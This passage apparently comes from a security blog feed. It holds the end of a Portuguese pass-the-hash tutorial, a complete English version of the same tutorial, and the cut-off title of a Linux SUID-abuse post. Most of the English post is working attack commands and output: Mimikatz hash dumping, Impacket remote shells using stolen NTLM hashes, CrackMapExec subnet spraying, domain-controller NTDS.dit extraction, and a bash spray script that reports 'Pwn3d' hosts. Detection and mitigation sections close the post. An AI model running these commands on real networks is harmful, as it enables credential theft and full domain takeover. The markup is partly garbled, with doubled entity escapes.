-H</span><span style="color:#ABB2BF"> &#x3C;</span><span style="color:#98C379">NTLM_HAS</span><span style="color:#ABB2BF">H> </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#D19A66"> --continue-on-success</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#98C379"> "Pwn3d"</span></span></code></pre> <h3 id="pivoting-para-o-domain-controller">Pivoting para o Domain Controller</h3> <p>Se o hash capturado pertence a um <strong>Domain Admin</strong>:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump do NTDS.dit via secretsdump (todos os hashes do domínio)</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> :</span><span style="color:#ABB2BF">&#x3C;</span><span style="color:#98C379">DA_NT_HAS</span><span style="color:#ABB2BF">H> </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/DomainAdmin@192.168.1.1</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -just-dc-ntlm</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Resultado: centenas de hashes, incluindo krbtgt para Golden Ticket</span></span></code></pre> <h2 id="script-de-automação">Script de automação</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># pth_spray.sh — Testa hash NTLM contra range de IPs via CrackMapExec</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">TARGET_RANGE</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"</span><span style="color:#E06C75;font-style:italic">${1</span><span style="color:#ABB2BF">:-</span><span style="color:#E06C75;font-style:italic">192</span><span style="color:#98C379">.</span><span style="color:#E06C75;font-style:italic">168</span><span style="color:#98C379">.</span><span style="color:#E06C75;font-style:italic">1</span><span style="color:#98C379">.</span><span style="color:#E06C75;font-style:italic">0</span><span style="color:#ABB2BF">/</span><span style="color:#E06C75;font-style:italic">24}</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#E06C75">USER</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"</span><span style="color:#E06C75;font-style:italic">${2</span><span style="color:#ABB2BF">:-</span><span style="color:#E06C75">Administrator</span><span style="color:#E06C75;font-style:italic">}</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#E06C75">HASH</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"</span><span style="color:#E06C75;font-style:italic">${3}</span><span style="color:#98C379">"</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#ABB2BF"> [[ </span><span style="color:#56B6C2">-z</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$HASH</span><span style="color:#98C379">"</span><span style="color:#ABB2BF"> ]]; </span><span style="color:#C678DD">then</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#98C379"> "Uso: </span><span style="color:#E06C75;font-style:italic">$0</span><span style="color:#98C379"> &#x3C;CIDR> &#x3C;user> &#x3C;NT_hash>"</span></span> <span class="line"><span style="color:#56B6C2"> exit</span><span style="color:#D19A66"> 1</span></span> <span class="line"><span style="color:#C678DD">fi</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[*] Iniciando PtH spray em </span><span style="color:#E06C75">$TARGET_RANGE</span><span style="color:#98C379"> como </span><span style="color:#E06C75">$USER</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[*] Hash: ${</span><span style="color:#E06C75">HASH</span><span style="color:#ABB2BF">:</span><span style="color:#E06C75">0</span><span style="color:#ABB2BF">:</span><span style="color:#E06C75">8</span><span style="color:#98C379">}...redacted"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> ""</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$TARGET_RANGE</span><span style="color:#98C379">"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$USER</span><span style="color:#98C379">"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#98C379"> "</span><span style="color:#E06C75">$HASH</span><span style="color:#98C379">"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --continue-on-success</span><span style="color:#ABB2BF"> 2></span><span style="color:#98C379">/dev/null</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">tee</span><span style="color:#98C379"> /tmp/pth_results.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">PWNED</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> "Pwn3d"</span><span style="color:#98C379"> /tmp/pth_results.txt</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> ""</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[+] Hosts comprometidos: </span><span style="color:#E06C75">$PWNED</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[*] Resultados em: /tmp/pth_results.txt"</span></span></code></pre> <blockquote> <p><strong>AVISO:</strong> Esta técnica deve ser utilizada exclusivamente em engajamentos de Red Team com autorização escrita. O uso não autorizado é crime.</p> </blockquote> <h2 id="detecção">Detecção</h2> <p>Defenders devem monitorar:</p> <table><thead><tr><th>Indicador</th><th>Event ID</th><th>Descrição</th></tr></thead><tbody><tr><td>Logon com hash (sem senha)</td><td>4624</td><td>Logon Type 3, sem NTLMv2 challenge completo</td></tr><tr><td>Uso de admin local generalizado</td><td>4648</td><td>Logon explícito com credenciais alternativas</td></tr><tr><td>Ferramentas conhecidas</td><td>7045</td><td>Serviço PSEXESVC criado</td></tr><tr><td>Anomalia de autenticação</td><td>4776</td><td>NTLM auth de host incomum</td></tr></tbody></table> <h2 id="mitigações">Mitigações</h2> <ul> <li><strong>KB2871997</strong> — Restringe uso de hashes para contas locais (exceto RID 500)</li> <li><strong>Protected Users Security Group</strong> — Força Kerberos, desabilita NTLM</li> <li><strong>Credential Guard</strong> — Isola LSA em VTL1, impede extração via Mimikatz</li> <li><strong>LAPS (Local Administrator Password Solution)</strong> — Senhas únicas por host, elimina o spray</li> <li><strong>Tiering model</strong> — Isola contas admin de domínio de workstations</li> <li><strong>Disable NTLMv1</strong> — Via GPO: <code>Network security: LAN Manager authentication level</code></li> </ul>redteam@kbmsecurity.com.brlateralpass-the-hashntlmlateral-movementwindowsmimikatzimpacketmediumPass-the-Hash — Lateral Movement Without a Cleartext Passwordhttps://www.kbmsecurity.com.br/blog/post/pass-the-hash-en/https://www.kbmsecurity.com.br/blog/post/pass-the-hash-en/How to capture NTLM hashes and use them directly for lateral authentication on Windows networks without cracking the password.Mon, 03 Feb 2025 00:00:00 GMT<h2 id="what-is-pass-the-hash">What is Pass-the-Hash?</h2> <p><strong>Pass-the-Hash (PtH)</strong> is an attack technique that allows authentication to Windows services using the <strong>NTLM hash</strong> of a user’s password—without ever needing the password in plain text.</p> <p>The Windows NTLM authentication protocol does not validate whether the client knows the original password; it validates whether the client has the correct hash. This makes NTLM hashes functionally equivalent to passwords.</p> <h2 id="why-does-this-work">Why does this work?</h2> <p>The NTLM authentication flow works like this:</p> <ol> <li>Client requests access to the server</li> <li>Server sends a <strong>challenge</strong> (random nonce)</li> <li>Client responds with <code>HMAC-MD5(NT_hash, challenge)</code></li> <li>Server verifies the response</li> </ol> <p>At no point is the plaintext password transmitted or verified. The hash <strong>is</strong> the credential.</p> <h2 id="prerequisites">Prerequisites</h2> <table><thead><tr><th>Requirement</th><th>Detail</th></tr></thead><tbody><tr><td>Target NTLM hash</td><td>Obtained via Mimikatz, secretsdump, etc.</td></tr><tr><td>Accessible service</td><td>SMB (445), WMI (135), RDP with NLA disabled</td></tr><tr><td>Valid account</td><td>Local admin or domain admin on the target</td></tr><tr><td>NTLMv1/v2 protocol</td><td>NTLM must be enabled on the target</td></tr></tbody></table> <p>> <strong>Note:</strong> Pass-the-Hash <strong>does not work</strong> against services that require Kerberos exclusively (e.g., environments with “Restrict NTLM” configured via GPO).</p> <h2 id="step-1--capturing-ntlm-hashes">Step 1 — Capturing NTLM hashes</h2> <h3 id="via-mimikatz-local-access-with-system">Via Mimikatz (local access with SYSTEM)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump credentials in memory</span></span> <span class="line"><span style="color:#56B6C2">mimikatz.exe</span><span style="color:#ABB2BF"> &#x26;quot;privilege::debug&#x26;quot; &#x26;quot;sekurlsa::logonpasswords&#x26;quot; </span><span style="color:#C678DD">exit</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Relevant output:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Username : Administrator</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span></span></code></pre> <h3 id="via-impacket-secretsdump-remote-with-admin-credentials">Via Impacket secretsdump (remote, with admin credentials)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Remote dump via SMB + DCE/RPC</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#98C379"> DOMAIN/Administrator:</span><span style="color:#ABB2BF">&#x26;#x27;P@ssw0rd&#x26;#x27;@192.168.1.10</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Dump using hash (already doing PtH to capture more hashes)</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.10</span></span></code></pre> <h3 id="via-crackmapexec">Via CrackMapExec</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump SAM database</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#D19A66"> --sam</span></span></code></pre> <p>The hash format is always <code>LM:NT</code>. LM is usually <code>aad3b435b51404eeaad3b435b51404ee</code> (empty hash) on modern systems. What matters is the <strong>NT</strong> part.</p> <h2 id="step-2--running-pth">Step 2 — Running PtH</h2> <h3 id="impacket--psexecpy">Impacket — psexec.py</h3> <p>Opens an interactive shell on the remote host via SMB:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">psexec.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Result:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Requesting shares on 192.168.1.20.....</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Found writable share ADMIN$</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Uploading file XKjQrPwN.exe</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Microsoft Windows [Version 10.0.19044.2251]</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># C:\Windows\system32&#x26;gt;</span></span></code></pre> <h3 id="impacket--wmiexecpy">Impacket — wmiexec.py</h3> <p>Execution via WMI (quieter than psexec, no file on disk):</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">wmiexec.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">whoami</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Result: domain\administrator</span></span></code></pre> <h3 id="impacket--smbclientpy">Impacket — smbclient.py</h3> <p>Access to the filesystem via SMB:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">smbclient.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Browse shares:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # use C$</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # ls</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # get Users\Administrator\Desktop\flag.txt</span></span></code></pre> <h3 id="crackmapexec--spray-on-the-network">CrackMapExec — Spray on the network</h3> <p>Test the hash against multiple hosts at once:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Check which hosts accept the hash</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Run command on all that accepted</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -x</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">net</span><span style="color:#98C379"> user</span><span style="color:#98C379"> /domain</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Output with (Pwn3d!) indicates success as local admin:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SMB 192.168.1.20 445 WIN10-DEV [+] DOMAIN\Administrator (Pwn3d!)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SMB 192.168.1.25 445 WIN-SRV01 [+] DOMAIN\Administrator (Pwn3d!)</span></span></code></pre> <h3 id="mimikatz--sekurlsapth">Mimikatz — sekurlsa::pth</h3> <p>Injects the hash into the current process for transparent authentication:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Opens an authenticated cmd.exe with the hash</span></span> <span class="line"><span style="color:#56B6C2">mimikatz.exe</span><span style="color:#ABB2BF"> &#x26;quot;sekurlsa::pth </span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">user:Administrator </span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">domain:CORP </span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">ntlm:8846f7eaee8fb117ad06bdd830b7586c </span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">run:</span><span style="color:#56B6C2">cmd.exe</span><span style="color:#ABB2BF">&#x26;quot;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># In the resulting window:</span></span> <span class="line"><span style="color:#ABB2BF">dir \\</span><span style="color:#D19A66">192.168</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">1.20</span><span style="color:#ABB2BF">\C$ </span><span style="color:#7F848E;font-style:italic"># direct access without password prompt</span></span> <span class="line"><span style="color:#ABB2BF">net use \\</span><span style="color:#D19A66">192.168</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">1.20</span><span style="color:#ABB2BF">\C$ </span><span style="color:#7F848E;font-style:italic"># maps the share</span></span></code></pre> <h2 id="movement-in-domain-environments">Movement in domain environments</h2> <h3 id="identifying-hosts-with-the-same-local-hash">Identifying hosts with the same local hash</h3> <p>Legacy Windows environments often have the local <code>.\Administrator</code> account with the <strong>same password</strong> on all workstations (identical OS image). A single hash compromises the entire subnet.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Quick mapping of assets with the same hash</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 10.10.10.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#ABB2BF"> &#x3C;</span><span style="color:#98C379">ntlm_has</span><span style="color:#ABB2BF">h> </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#D19A66"> --continue-on-success</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Pwn3d</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <h3 id="pivoting-to-the-domain-controller">Pivoting to the Domain Controller</h3> <p>If the captured hash belongs to a <strong>Domain Admin</strong>:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump NTDS.dit via secretsdump (all domain hashes)</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> :</span><span style="color:#ABB2BF">&#x3C;</span><span style="color:#98C379">da_nt_has</span><span style="color:#ABB2BF">h> </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/DomainAdmin@192.168.1.1</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -just-dc-ntlm</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Result: hundreds of hashes, including krbtgt for Golden Ticket</span></span></code></pre> <h2 id="automation-script">Automation script</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># pth_spray.sh — Tests NTLM hash against IP range via CrackMapExec</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">TARGET_RANGE</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75;font-style:italic">${1</span><span style="color:#ABB2BF">:-</span><span style="color:#E06C75;font-style:italic">192</span><span style="color:#ABB2BF">.</span><span style="color:#E06C75;font-style:italic">168</span><span style="color:#ABB2BF">.</span><span style="color:#E06C75;font-style:italic">1</span><span style="color:#ABB2BF">.</span><span style="color:#E06C75;font-style:italic">0</span><span style="color:#ABB2BF">/</span><span style="color:#E06C75;font-style:italic">24}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75">USER</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75;font-style:italic">${2</span><span style="color:#ABB2BF">:-</span><span style="color:#E06C75">Administrator</span><span style="color:#E06C75;font-style:italic">}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75">HASH</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75;font-style:italic">${3}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#ABB2BF"> [[ </span><span style="color:#56B6C2">-z</span><span style="color:#ABB2BF"> &#x26;quot;</span><span style="color:#E06C75">$HASH</span><span style="color:#ABB2BF">&#x26;quot; ]]; </span><span style="color:#C678DD">then</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Usage:</span><span style="color:#E06C75;font-style:italic"> $0</span><span style="color:#ABB2BF"> &#x3C;</span><span style="color:#98C379">cid</span><span style="color:#ABB2BF">r>&#x3C;</span><span style="color:#98C379">use</span><span style="color:#ABB2BF">r>&#x3C;</span><span style="color:#98C379">nt_has</span><span style="color:#ABB2BF">h>&#x26;</span><span style="color:#98C379">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2"> exit</span><span style="color:#D19A66"> 1</span></span> <span class="line"><span style="color:#C678DD">fi</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Starting PtH spray on </span><span style="color:#E06C75">$TARGET_RANGE</span><span style="color:#ABB2BF"> as </span><span style="color:#E06C75">$USER</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Hash: ${</span><span style="color:#E06C75">HASH</span><span style="color:#ABB2BF">:</span><span style="color:#E06C75">0</span><span style="color:#ABB2BF">:</span><span style="color:#E06C75">8</span><span style="color:#ABB2BF">}...redacted&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$TARGET_RANGE</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$USER</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> -H</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$HASH</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> --continue-on-success</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">tee</span><span style="color:#98C379"> /tmp/pth_results.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">PWNED</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">Pwn3d</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">/tmp/pth_results.txt</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[+] Compromised hosts: </span><span style="color:#E06C75">$PWNED</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Results in: /tmp/pth_results.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <p>> <strong>WARNING:</strong> This technique should only be used in Red Team engagements with written authorization. Unauthorized use is a crime.</p> <h2 id="detection">Detection</h2> <p>Defenders should monitor:</p> <table><thead><tr><th>Indicator</th><th>Event ID</th><th>Description</th></tr></thead><tbody><tr><td>Logon with hash (no password)</td><td>4624</td><td>Logon Type 3, without complete NTLMv2 challenge</td></tr><tr><td>Widespread use of local admin</td><td>4648</td><td>Explicit logon with alternate credentials</td></tr><tr><td>Known tools</td><td>7045</td><td>PSEXESVC service created</td></tr><tr><td>Authentication anomaly</td><td>4776</td><td>Unusual host NTLM auth</td></tr></tbody></table> <h2 id="mitigations">Mitigations</h2> <ul> <li><strong>KB2871997</strong> — Restricts use of hashes for local accounts (except RID 500)</li> <li><strong>Protected Users Security Group</strong> — Forces Kerberos, disables NTLM</li> <li><strong>Credential Guard</strong> — Isolates LSA in VTL1, prevents extraction via Mimikatz</li> <li><strong>LAPS (Local Administrator Password Solution)</strong> — Unique passwords per host, eliminates spray</li> <li><strong>Tiering model</strong> — Isolates domain admin accounts from workstations</li> <li><strong>Disable NTLMv1</strong> — Via GPO: <code>Network security: LAN Manager authentication level</code>&#x3C;/nt_hash>&#x3C;/da_nt_hash>&#x3C;/ntlm_hash></li> </ul>redteam@kbmsecurity.com.brlateralpass-the-hashntlmlateral-movementwindowsmimikatzimpacketmediumAbuso de SUID — Escalando para Root com Binários Esquecidoshttps://www.kbmsecurity.com.br/blog/post/suid-abuse-linux/https://www.kbmsecurity.com.br/blog/post/suid-abuse-linux/Como binários SUID mal configurados no 